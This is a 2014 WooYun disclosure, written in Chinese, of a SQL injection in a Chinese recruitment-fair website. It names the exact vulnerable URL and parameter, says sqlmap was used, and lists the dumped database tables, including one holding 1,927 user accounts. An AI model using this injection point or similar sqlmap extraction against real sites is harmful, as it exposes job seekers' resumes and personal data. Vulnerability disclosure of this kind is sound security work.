漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-056408
漏洞标题:群英招聘网旗下群英会存在sql注入漏洞
相关厂商:群英招聘
漏洞作者: bitcoin
提交时间:2014-04-09 18:05
修复时间:2014-05-24 18:07
公开时间:2014-05-24 18:07
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-04-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-05-24: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
“群英会”创办于1999年,定位服务于大中型企业和中高级人才,旗下拥有中高级人才招聘会、高级人才招聘会、各行业高端人才招聘会等三大系列品牌招聘会,高规格、高品质、专业化运作,按月定期举办,是我市大中型企业配置中高级人才的主渠道之一。“群英会”已成为华南地区最具影响力的品牌招聘会。
详细说明:
注入点:
http://qyh.zshr.cn/person/searchjobs.php?id=1
参数id存在注入
请出sqlmap
Database: index91db5
[66 tables]
+-------------------------+
| v_resume_vipinfo |
| xkj_ad |
| xkj_ad_category |
| xkj_admin |
| xkj_admin_log |
| xkj_article |
| xkj_article_category |
| xkj_article_property |
| xkj_category |
| xkj_category_district |
| xkj_category_group |
| xkj_category_jobs |
| xkj_comment |
| xkj_company_down_resume |
| xkj_company_favorites |
| xkj_company_interview |
| xkj_company_profile |
| xkj_config |
| xkj_crons |
| xkj_explain |
| xkj_explain_category |
| xkj_feedback |
| xkj_hotword |
| xkj_hrtools |
| xkj_hrtools_category |
| xkj_jobs |
| xkj_jobs_contact |
| xkj_link |
| xkj_link_category |
| xkj_locoyspider |
| xkj_mail_templates |
| xkj_mailconfig |
| xkj_mailqueue |
| xkj_members |
| xkj_members_info |
| xkj_members_log |
| xkj_members_points |
| xkj_members_points_rule |
| xkj_members_setmeal |
| xkj_navigation |
| xkj_navigation_category |
| xkj_notice |
| xkj_notice_category |
| xkj_order |
| xkj_page |
| xkj_payment |
| xkj_personal_favorites |
| xkj_personal_jobs_apply |
| xkj_promotion |
| xkj_promotion_category |
| xkj_report |
| xkj_resume |
| xkj_resume_copy |
| xkj_resume_copy1 |
| xkj_resume_education |
| xkj_resume_jobs |
| xkj_resume_training |
| xkj_resume_vipinfo |
| xkj_resume_work |
| xkj_resume_work_copy |
| xkj_setmeal |
| xkj_sms_config |
| xkj_sms_templates |
| xkj_syslog |
| xkj_text |
| xkj_tpl |
这个表就有1927个用户,这里就不一一列出了
漏洞证明:
如上
修复方案:
过滤,有礼物不?
版权声明:转载请注明来源 bitcoin@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝